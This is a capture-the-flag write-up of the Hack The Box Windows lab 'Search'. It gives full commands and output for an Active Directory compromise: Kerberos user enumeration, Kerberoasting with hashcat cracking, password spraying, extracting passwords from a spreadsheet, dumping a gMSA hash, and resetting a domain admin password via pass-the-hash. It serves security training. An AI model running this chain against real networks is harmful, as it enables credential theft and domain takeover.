HTB - Search
Machine Info
Search is a hard difficulty Windows machine that focuses on Active Directory enumeration and exploitation techniques. Foothold is obtained by finding exposed credentials in a web page, enumerating AD users, running a Kerberoast attack to obtain a crackable hash for a service account and spraying the password against a subset of the discovered accounts, obtaining access to a SMB share where a protected XLSX file containing user data is found. Unprotecting the file leads to a second set of credentials, which gives access to another share where PKCS#12 certificates can be downloaded. After importing the certificates into a web browser, Windows PowerShell Web Access can be used to obtain an interactive shell on the system. Due to misconfigured ACLs, the user can retrieve the password of a group managed service account which can change the password of an administrative user, resulting in high-privileged access to the system via wmiexec or psexec.
Enumeration
Scope
IP Address: 10.10.11.129
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
8172/tcp open unknown syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,80,88,135,139,443,445,636,3268,3269,8172,9389 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Search — Just Testing IIS
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-13 08:44:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
| http-methods:
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after: 2030-08-09T08:13:35
8172/tcp open ssl/http Microsoft IIS httpd 10.0
|_ssl-date: 2024-07-13T08:46:28+00:00; +4s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after: 2030-04-05T09:05:25
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb2-time:
| date: 2024-07-13T08:45:49
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required* Open ports: 53,80,88,135,139,443,445,636,3268,3269,8172,9389
* UDP Open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - LDAP - KERBEROS - RPC - SMB
* Versions: IIS httpd 10.0
* Important Notes: Domain: search.htb - IIS 10.0 on 8172SMB Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.129 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.11.129 445 RESEARCH [+] search.htb\:
SMB 10.10.11.129 445 RESEARCH [-] Error enumerating shares: STATUS_ACCESS_DENIEDRPC Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ rpcclient -U '%' $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIEDHTTP Enumeration
I found both http & https have the same webapp. The most interesting thing for the first eye is Our Team section that could be use as usernames'
I created a wordlist of their names and run username-anarchy on them to make different combinations
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ cat users.lst
Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ /opt/username-anarchy/username-anarchy -i users.lst | tee users.list
<snip>
keely.lyons
keelylyo
keellyon
<snip>
daxsantiago
dax.santiago
<snip>Start to enumerate these users against Kerberos to find if any of them is valid
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 ./users.list
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop
2024/07/13 04:57:07 > Using KDC(s):
2024/07/13 04:57:07 > 10.10.11.129:88
2024/07/13 04:57:07 > [+] VALID USERNAME: keely.lyons@search.htb
2024/07/13 04:57:07 > [+] VALID USERNAME: dax.santiago@search.htb
2024/07/13 04:57:07 > [+] VALID USERNAME: sierra.frye@search.htbI found one more user when using xato-net-10-million wordlist
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/13/24 - Ronnie Flathers @ropnop
2024/07/13 05:13:59 > Using KDC(s):
2024/07/13 05:13:59 > 10.10.11.129:88
2024/07/13 05:14:00 > [+] VALID USERNAME: administrator@search.htb
2024/07/13 05:14:01 > [+] VALID USERNAME: research@search.htb
2024/07/13 05:14:09 > [+] VALID USERNAME: Administrator@search.htbTried to get ASREP hash from any of these users but also failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetNPUsers search.htb/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User dax.santiago doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User keely.lyons doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sierra.frye doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User research doesn't have UF_DONT_REQUIRE_PREAUTH setI don't like the following part as it's very like to CTF-Style
Foothold
Auth as hope. Sharp
It says Send Password to Hope Sharp then followed by IsolationIsKey!
Let's do the same thing we did before against that user
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ /opt/username-anarchy/username-anarchy -i hope.user| tee -a hope.wordlist
hope
hopesharp
hope.sharp
hopeshar
hopes
h.sharp
hsharp
shope
s.hope
sharph
sharp
sharp.h
sharp.hope
hs
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ kerbrute userenum --dc $ip -d search.htb -t 100 ./hope.wordlist
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
2024/07/13 05:29:12 > [+] VALID USERNAME: hope.sharp@search.htbOne more user found, I will try to authenticate with it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u hope.sharp -p 'IsolationIsKey?'
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey? I will then begin to enumerate the domain with the credentials I found and start with smb shares
I have Read access on several shares and Read, Write access on RedirectedFolders$
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u hope.sharp -p 'IsolationIsKey?' -M spider_plus
SMB 10.10.11.129 445 RESEARCH [+] search.htb\hope.sharp:IsolationIsKey?
SPIDER_P... 10.10.11.129 445 RESEARCH [*] Started spidering plus with option:
SPIDER_P... 10.10.11.129 445 RESEARCH [*] DIR: ['print$']
SPIDER_P... 10.10.11.129 445 RESEARCH [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.129 445 RESEARCH [*] SIZE: 51200
SPIDER_P... 10.10.11.129 445 RESEARCH [*] OUTPUT: /tmp/cme_spider_plus
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nano /tmp/cme_spider_plus/10.10.11.129.json
"CertEnroll": {
"Research.search.htb_search-RESEARCH-CA.crt": {
"atime_epoch": "2020-04-07 03:29:29",
"ctime_epoch": "2020-04-07 03:29:29",
"mtime_epoch": "2020-04-07 03:29:29",
"size": "883 Bytes"
},
"nsrev_search-RESEARCH-CA.asp": {
"atime_epoch": "2020-04-07 03:29:31",
"ctime_epoch": "2020-04-07 03:29:31",
"mtime_epoch": "2020-04-07 03:29:31",
"size": "330 Bytes"
},
"search-RESEARCH-CA+.crl": {
"atime_epoch": "2024-07-13 04:38:27",
"ctime_epoch": "2020-04-07 03:29:32",
"mtime_epoch": "2024-07-13 04:38:27",
"size": "735 Bytes"
},
"search-RESEARCH-CA.crl": {
"atime_epoch": "2024-07-13 04:38:25",
"ctime_epoch": "2020-04-07 03:29:32",
"mtime_epoch": "2024-07-13 04:38:25",
"size": "931 Bytes"
}
<snip>
"sierra.frye/Desktop/user.txt": {
"atime_epoch": "2021-11-17 19:55:27",
"ctime_epoch": "2021-11-17 19:55:27",
"mtime_epoch": "2021-11-17 20:18:26",
"size": "33 Bytes"
},
"sierra.frye/user.txt": {
"atime_epoch": "2021-11-17 19:55:27",
"ctime_epoch": "2021-11-17 19:55:27",
"mtime_epoch": "2021-11-17 20:01:45",
"size": "33 Bytes
<snip>
"search.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml": {
"atime_epoch": "2020-04-07 08:25:21",
"ctime_epoch": "2020-04-07 08:25:14",
"mtime_epoch": "2020-04-07 08:25:21",
"size": "634 Bytes"
},
"search.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Services/Services.xml": {
"atime_epoch": "2020-04-09 16:40:35",
"ctime_epoch": "2020-04-09 16:39:42",
"mtime_epoch": "2020-04-09 16:40:35",
"size": "693 Bytes"I will connect to smb server and download the files found
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -U hope.sharp \\\\$ip\\CertEnroll
Password for [WORKGROUP\hope.sharp]:
smb: \> ls
. Dc 0 Sat Jul 13 04:38:27 2024
.. Dc 0 Sat Jul 13 04:38:27 2024
nsrev_search-RESEARCH-CA.asp Ac 330 Tue Apr 7 03:29:31 2020
Research.search.htb_search-RESEARCH-CA.crt Ac 883 Tue Apr 7 03:29:29 2020
search-RESEARCH-CA+.crl Ac 735 Sat Jul 13 04:38:27 2024
search-RESEARCH-CA.crl Ac 931 Sat Jul 13 04:38:25 2024
smb: \> mget *Do the same thing for Group.xmls & Service.xmls. I didn't find anything in them anyway :)
The share RedirectedFolders$ is important and has several folders in it, So I will mount it to my kali machine
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ sudo mount -t cifs "\\\\$ip\\RedirectedFolders$" ./mount -o "username=hope.sharp,password=IsolationIsKey?"
[sudo] password for kali: ┌──(kali㉿kali)-[~/…/HTB/machines/Search/mount]
└─$ ls
Angie.Duffy Cameron.Melendez Cortez.Hickman Edith.Walls Reginald.Morton abril.suarez chanel.bell edgar.jacobs frederick.cuevas jayla.roberts santino.benjamin trace.ryan
Antony.Russo Claudia.Pugh Eddie.Stevens Jordan.Gregory Savanah.Velazquez belen.compton dax.santiago eve.galvan hope.sharp payton.harmon sierra.fryeThe folder
sierra.fryacontain the flag but I couldn't read it.
When we have Write access on specific share, we could put Shell command file (.scf) on it and if any user explore the share - not necessarily to open the file - it will connect to my smb server
I also tried to put
.scfon the share but with no luck :(
Auth with web_svc
Running bloodhound to collect information while attempting get kerberoastable users
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ bloodhound-python -u 'hope.sharp' -p 'IsolationIsKey?' -ns $ip -d search.htb -c all
<snip>Since, I have valid username and password I will try to find if there is any kerberoastable account
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -dc-ip $ip
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 08:59:11.329031 <never>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-GetUserSPNs search.htb/hope.sharp:'IsolationIsKey?' -dc-ip $ip -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- ------- -------- -------------------------- --------- ----------
RESEARCH/web_svc.search.htb:60001 web_svc 2020-04-09 08:59:11.329031 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$f3f3fd4fb0614c575add9b79b9965c17$6b816bedbacc2f81ecf9312be18bba19d3d028c0e5be49399fb677d22fdd04950e9faf80f78ad046e003a0ab373e3542fbdb7b3e55fe24b838f7b4d433837e3fa36600141084aedeb74cf4ba9b9b108235e3ab256e47fb37ae4c49380b72faeeb90366c857b1ff9fc8e7bf35d584a90b455dbaa113221485ec524a72fa02160ad3ef2081d629f476805598791cb6bc6de576c82ef96e62ba729523f1302bdad997fc727ad91e1e642f8d458acb62e512014f186fc41d642ef6d32fc5d375cec6989f135f9f9701bf4706cdb8185de61b4bd55144f2b755d84cd13113f43f224b1277dee3f6a770f908d05eaa8eb9897fa6f151c0dfcdaa3bfc473f6826ea72d9edbb1ec5710ec05378039cbb0469f30a22b1fb6d46fca8e9838beeca0879138ca8c01f1c34803d9c91b2b9d53f310d921c2245873496f51c19f6510a51ff7ce71136a7c48cbabf1e37d045d90f78b12d16f50f5df4144e4569fb35551d1d943d32d8e59d237e672587985a16c0a2744aa6571062f7a882f0a1502bd23f51198fb312399fa7b7caba16d67834c0099488100f569eb5f3cc30e2e7957d21c4948d44ba824657d87efa292197dbc12fc178ddcb4b24bd8dda75c5123346dc57fccc6373291985826d30be3e80c748eb296ab516a86acc16376dfd047e508159cdbd967babf8bad80a33824f92a772d5c18e69966fa9cc216c8e88fb4cfb050cfdeccaba80ea26b027fbad96dd03534aa8f7cdf60a310a45d81d1d9f596466617b5b0b2b4c6d3160483118359d68cc1a2e145ff47254ff53be12658db5eefa933533f6417607c865fac6fc70935719a2a8955c0dec44f3475dcdfc9b0ada516cb49fe136655ea63e71e757116cb4a775a4c13a535718cb631f68a2f013f873249526d7461fa5d61c46288624be1ec7e233f263f2cdfd5a1b81f89f82455261af2880dbe7bb19d3bea2bab1e00ec76bf7751e9d862554b6b0b8df7c03ca2159cab24c68c0c66ca42fb8615464d12115a83c1d73c936c95205ff6b9d93a283b21aabca8698dfad71310d9c84b259f9c7764b9676b4d01426c6ecdaaeabae269c4d4fde33b070eae96e0b7284861ddeeb237c0be49976a75e91c82be41c3e766467aa942b73e8bb2619bf5be4f10f5d018538633105ed817ebac5488d363e66c19e5a1848adfae25094860b7730c8cf4a631f514d1f04f298e85354a42fdba67b4dfc8a5da19efc185bb2348955bf04411088061a1e440a89f60fdbb80967da565d4b5e3ac722510f1529ec3df25bd06cb7e708db884a092e84c5ae9b9c0c31a70641816a7ed8bf9e190ae46058ae582db2b2808db2b5a962ade01e191a311e0854f6f37fe99e60f3014526a3a6ff32a72c227bd2fc055c4dfde32f4250e003aedd2d7281e52e1f1a4396c8c655fd848c609017574254e2776135480dec99c67bfcf4645b6ac2e9c7a50e39802b40c82375d02cf885d36e8d┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ hashcat -m 13100 kerberos.hash /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$f3f3fd4fb0614c575add9b79b9965c17$6b816bedbacc2f81ecf9312be18bba19d3d028c0e5be49399fb677d22fdd04950e9faf80f78ad046e003a0ab373e3542fbdb7b3e55fe24b838f7b4d433837e3fa36600141084aedeb74cf4ba9b9b108235e3ab256e47fb37ae4c49380b72faeeb90366c857b1ff9fc8e7bf35d584a90b455dbaa113221485ec524a72fa02160ad3ef2081d629f476805598791cb6bc6de576c82ef96e62ba729523f1302bdad997fc727ad91e1e642f8d458acb62e512014f186fc41d642ef6d32fc5d375cec6989f135f9f9701bf4706cdb8185de61b4bd55144f2b755d84cd13113f43f224b1277dee3f6a770f908d05eaa8eb9897fa6f151c0dfcdaa3bfc473f6826ea72d9edbb1ec5710ec05378039cbb0469f30a22b1fb6d46fca8e9838beeca0879138ca8c01f1c34803d9c91b2b9d53f310d921c2245873496f51c19f6510a51ff7ce71136a7c48cbabf1e37d045d90f78b12d16f50f5df4144e4569fb35551d1d943d32d8e59d237e672587985a16c0a2744aa6571062f7a882f0a1502bd23f51198fb312399fa7b7caba16d67834c0099488100f569eb5f3cc30e2e7957d21c4948d44ba824657d87efa292197dbc12fc178ddcb4b24bd8dda75c5123346dc57fccc6373291985826d30be3e80c748eb296ab516a86acc16376dfd047e508159cdbd967babf8bad80a33824f92a772d5c18e69966fa9cc216c8e88fb4cfb050cfdeccaba80ea26b027fbad96dd03534aa8f7cdf60a310a45d81d1d9f596466617b5b0b2b4c6d3160483118359d68cc1a2e145ff47254ff53be12658db5eefa933533f6417607c865fac6fc70935719a2a8955c0dec44f3475dcdfc9b0ada516cb49fe136655ea63e71e757116cb4a775a4c13a535718cb631f68a2f013f873249526d7461fa5d61c46288624be1ec7e233f263f2cdfd5a1b81f89f82455261af2880dbe7bb19d3bea2bab1e00ec76bf7751e9d862554b6b0b8df7c03ca2159cab24c68c0c66ca42fb8615464d12115a83c1d73c936c95205ff6b9d93a283b21aabca8698dfad71310d9c84b259f9c7764b9676b4d01426c6ecdaaeabae269c4d4fde33b070eae96e0b7284861ddeeb237c0be49976a75e91c82be41c3e766467aa942b73e8bb2619bf5be4f10f5d018538633105ed817ebac5488d363e66c19e5a1848adfae25094860b7730c8cf4a631f514d1f04f298e85354a42fdba67b4dfc8a5da19efc185bb2348955bf04411088061a1e440a89f60fdbb80967da565d4b5e3ac722510f1529ec3df25bd06cb7e708db884a092e84c5ae9b9c0c31a70641816a7ed8bf9e190ae46058ae582db2b2808db2b5a962ade01e191a311e0854f6f37fe99e60f3014526a3a6ff32a72c227bd2fc055c4dfde32f4250e003aedd2d7281e52e1f1a4396c8c655fd848c609017574254e2776135480dec99c67bfcf4645b6ac2e9c7a50e39802b40c82375d02cf885d36e8d:@3ONEmillionbaby
Session..........: hashcat
Status...........: CrackedI created a wordlist for domain usernames from rpcclient then going to password spray the password of user web_svc since I didn't find anything interesting about that user on bloodhound or in shares.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ rpcclient -U 'web_svc%@3ONEmillionbaby' $ip -c "enumdomusers" | cut -d: -f2 | cut -d"[" -f2 | cut -d"]" -f1 | tee -a domain_users.list
<snip>
Amare.Serrano
Savanah.Knox
Frederick.Cuevas
Marshall.Skinner
Edgar.Jacobs
Elisha.Watts
Belen.Compton
Amari.Mora
Cadence.Conner
Katelynn.Costa
<snip>Auth with Edgar.Jacobs
Got a hit with user Edgar.Jacobs
I looked at bloodhound to see if this user has any high privileges but unlucky, So I will enumerate the shares with that user.
On Starting
spider_plusmodule withcrackmapexec, I found that:helpdeskshare is emptyRedirectedFolders$has an interesting file atedgar.jacobs/Desktop/Phishing_Attempt.xlsxwhich can contain valid credentials or important data
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u Edgar.Jacobs -p '@3ONEmillionbaby' -M spider_plus
SMB 10.10.11.129 445 RESEARCH [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\Edgar.Jacobs:@3ONEmillionbaby
SPIDER_P... 10.10.11.129 445 RESEARCH [*] Started spidering plus with option:
SPIDER_P... 10.10.11.129 445 RESEARCH [*] DIR: ['print$']
SPIDER_P... 10.10.11.129 445 RESEARCH [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.129 445 RESEARCH [*] SIZE: 51200
SPIDER_P... 10.10.11.129 445 RESEARCH [*] OUTPUT: /tmp/cme_spider_plus
"helpdesk": {}
<snip>
"RedirectedFolders$": {
"edgar.jacobs/Desktop/Phishing_Attempt.xlsx": {
"atime_epoch": "2020-08-10 06:30:05",
"ctime_epoch": "2020-04-09 16:06:41",
"mtime_epoch": "2020-08-10 06:30:05",
"size": "22.59 KB"
},┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ smbclient -U Edgar.Jacobs \\\\$ip\\RedirectedFolders$
Password for [WORKGROUP\Edgar.Jacobs]:
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx Privilege Escalation
Shell as sierra.frye
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ exiftool Phishing_Attempt.xlsx
<snip>
File Type : XLSX
File Type Extension : xlsx
MIME Type : application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0xcc14a176
Zip Compressed Size : 442
Zip Uncompressed Size : 1996
Zip File Name : [Content_Types].xml
Last Modified By : Edgar Jacobs
<snip>The file is xlsx file and zip compressed, I will view it in MicroSoft Excel
It has two sheets Passwords 01082020 & Captured
Passwords 01082020
Captured
There was no interesting data in the two sheets so I will unzip the file and explore it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ unzip Phishing_Attempt.xlsx
Archive: Phishing_Attempt.xlsx
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: xl/workbook.xml
inflating: xl/_rels/workbook.xml.rels
inflating: xl/worksheets/sheet1.xml
inflating: xl/worksheets/sheet2.xml
inflating: xl/theme/theme1.xml
inflating: xl/styles.xml
inflating: xl/sharedStrings.xml
inflating: xl/drawings/drawing1.xml
inflating: xl/charts/chart1.xml
inflating: xl/charts/style1.xml
inflating: xl/charts/colors1.xml
inflating: xl/worksheets/_rels/sheet1.xml.rels
inflating: xl/worksheets/_rels/sheet2.xml.rels
inflating: xl/drawings/_rels/drawing1.xml.rels
inflating: xl/charts/_rels/chart1.xml.rels
inflating: xl/printerSettings/printerSettings1.bin
inflating: xl/printerSettings/printerSettings2.bin
inflating: xl/calcChain.xml
inflating: docProps/core.xml
inflating: docProps/app.xml sharedStrings.xml file has the content of the sheet two but there is more data than xlsx when I opened it with microsoft Excel.
The new data located between these tags <t>*</t>.
┌──(kali㉿kali)-[~/…/HTB/machines/Search/xlsx]
└─$ cat xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="49" uniqueCount="49"><si><t>firstname</t></si><si><t>lastname</t></si><si><t>password</t></si><si><t>Payton</t></si><si><t>Harmon</t></si><si><t>Cortez</t></si><si><t>Hickman</t></si><si><t>Bobby</t></si><si><t>Wolf</t></si><si><t>Margaret</t></si><si><t>Robinson</t></si><si><t>Costa</t></si><si><t>Scarlett</t></si><si><t>Parks</t></si><si><t>Eliezer</t></si><si><t>Jordan</t></si><si><t>Hunter</t></si><si><t>Kirby</t></si><si><t>Annabelle</t></si><si><t>Wells</t></si><si><t>Eve</t></si><si><t>Galvan</t></si><si><t>Jeramiah</t></si><si><t>Fritz</t></si><si><t>Abby</t></si><si><t>Gonzalez</t></si><si><t>Joy</t></si><si><t>Vincent</t></si><si><t>Sutton</t></si><si><t>Sierra</t></si><si><t>Frye</t></si><si><t>Username</t></si><si><t>Date</t></si><si><t>Captured Passwords</t></si><si><t>IT ChangeOver Keely Lyons Started</t></si><si><t>//51+mountain+DEAR+noise+83//</t></si><si><t>++47|building|WARSAW|gave|60++</t></si><si><t>!!05_goes_SEVEN_offer_83!!</t></si><si><t>~~27%when%VILLAGE%full%00~~</t></si><si><t>==95~pass~QUIET~austria~77==</t></si><si><t>//61!banker!FANCY!measure!25//</t></si><si><t>??40:student:MAYOR:been:66??</t></si><si><t>&&75:major:RADIO:state:93&&</t></si><si><t>**30*venus*BALL*office*42**</t></si><si><t>;;36!cried!INDIA!year!50;;</t></si><si><t>..10-time-TALK-proud-66..</t></si><si><t>??47^before^WORLD^surprise^91??</t></si><si><t>**24&moment&BRAZIL&members&66**</t></si><si><t>$$49=wide=STRAIGHT=jordan=28$$18</t></si></sst> I created a wordlist of these records and start to brute force against user sierra.frye and I got a hit
I mounted the share Redirectedfolders$ as user sierra.frya
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ sudo mount -t cifs "\\\\$ip\\Redirectedfolders$" ./mount -o 'username=sierra.frye,password=$$49=wide=STRAIGHT=jordan=28$$18'
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ cd mount/sierra.frye
┌──(kali㉿kali)-[~/…/machines/Search/mount/sierra.frye]
└─$ tree
.
├── Desktop
│ ├── $RECYCLE.BIN
│ │ └── desktop.ini
│ ├── @rce.scf
│ ├── Microsoft Edge.lnk
│ ├── desktop.ini
│ └── user.txt
├── Documents
│ ├── $RECYCLE.BIN
│ │ └── desktop.ini
│ └── desktop.ini
├── Downloads
│ ├── $RECYCLE.BIN
│ │ └── desktop.ini
│ ├── Backups
│ │ ├── search-RESEARCH-CA.p12
│ │ └── staff.pfx
│ └── desktop.ini
└── user.txtThere are two new files I didn't see before under Backups folder
search-RESEARCH-CA.p12&staff.pfx
These two files can be uploaded to your browser and access the webapp on port 443 that lead to PowerShell Web Access Console, but I took different path :) .
Get the flag
┌──(kali㉿kali)-[~/…/machines/Search/mount/sierra.frye]
└─$ cat user.txt
07129b5634467dbe9cxxxxxxxxxxUser Flag: 07129b5634467dbxxxxxxxxxxx
Shell as Administrator
User
sierra.fryecan PSRemote to the machine as it's member ofBIRMINGHAM-ITSECwhich is member ofIISECITSEChas the privileges to readGMSApasswordGroup
BIR-ADFS-GMSA$hasGenericAllrights on userTristan.davieswhich is a member of thedomain adminsgroup
So, if we can takeover sierra.frye user, we can reach Domain Admins from the attack path above
More about GMSA from bloodhound
Read GMSA password with gMSADumper.py or NetExec
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nxc ldap $ip -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' --gmsa
<snip>
LDAPS 10.10.11.129 636 RESEARCH Account: BIR-ADFS-GMSA$ NTLM: e1e9fd9e46d0d747e1595167eedcec0fChange password of TRISTAN.DAVIES Account using net rpc tool
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ pth-net rpc password "TRISTAN.DAVIES" 'P@ssword123!' -U "search.htb"/"BIR-ADFS-GMSA$"%"ffffffffffffffffffffffffffffffff":"e1e9fd9e46d0d747e1595167eedcec0f" -S "$ip"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u TRISTAN.DAVIES -p 'P@ssword123!'
SMB 10.10.11.129 445 RESEARCH [+] search.htb\TRISTAN.DAVIES:P@ssword123! (Pwn3d!)┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
